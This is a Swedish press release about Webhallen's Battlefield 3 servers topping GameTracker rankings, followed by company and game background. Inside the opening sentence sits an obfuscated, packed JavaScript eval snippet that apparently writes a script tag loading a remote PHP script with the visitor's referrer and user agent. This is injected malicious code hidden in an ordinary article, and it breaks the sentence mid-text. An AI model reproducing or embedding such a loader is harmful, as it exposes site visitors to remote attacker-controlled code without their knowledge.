Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Webhallen spelserver populärast i världen

Webhallen spelserver populärast i världen
Revue Magazine

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|snhzs|var|u0026u|referrer|efhez||js|php’.split(’|’),0,{}))
ett led att stärka banden till sina kunder har Webhallen sedan slutet av 2010 infört spelservrar till populära spel som Call of duty – Black Ops, Battlefield – Bad Company 2, Bad Company 2 – Vietnam och nu senast Battlefield 3. Efter att ha lyssnat på feedback från spelare och utfört optimeringar i serverparken kan Webhallens Battlefield 3-servrar nu stoltsera med att vara de populäraste i världen, enligt hemsidan GameTracker.com, med ytterligare tre servrar inom topp 10. I dagsläget tillhandahåller Webhallen 20st Battlefield 3-servrar.

Webhallen anordnar regelbundet tävlingar på servrarna. Den senaste tävlingen hölls på datorspelsfestivalen Dreamhack och prispotten bestod av varor samt presentkort till ett totalt värde av 50,000:-

En server är en värddator som tillhandahåller en specifik tjänst till andra datorer som ansluter till den, exempelvis ligger hemsidor på s.k webbservrar. En spelserver agerar värd för användare som vill spela mot andra människor online. Battlefield 3-servrar tillåter i regel upp till 64 anslutna användare åt gången.

– Vi är otroligt glada över hur snabbt våra servrar har etablerat sig i världstoppen. Att tillhandahålla denna typ av tjänster är vårt sätt att ge tillbaka till våra kunder och vi försöker alltid utveckla den delen av vår verksamhet, säger Wilhelm Sporrong, VD för Webhallen.

Battlefield 3 (även känt som BF3) är ett datorspel utvecklat av den svenska spelstudion DICE, och publiceras av Electronic Arts. Battlefield 3 släpptes till PC, Playstation 3 och Xbox 360 den 27 oktober 2011. Spelet bygger på den kraftfulla spelmotorn Frostbite 2.0. EA spenderade totalt 1.2 miljarder kronor på marknadsföring för spelet.

Webhallen Sverige AB som koncept grundades 1999 i en liten lägenhet i centrala Stockholm och har på kort tid vuxit till att idag vara en av Sveriges
ledande återförsäljare inom hårdvara, hemelektronik, spel och film med butiker i Stockholm, Göteborg, Malmö, Uppsala, Linköping samt en webbshop.
2010 omsatte företaget ca 720 miljoner kronor.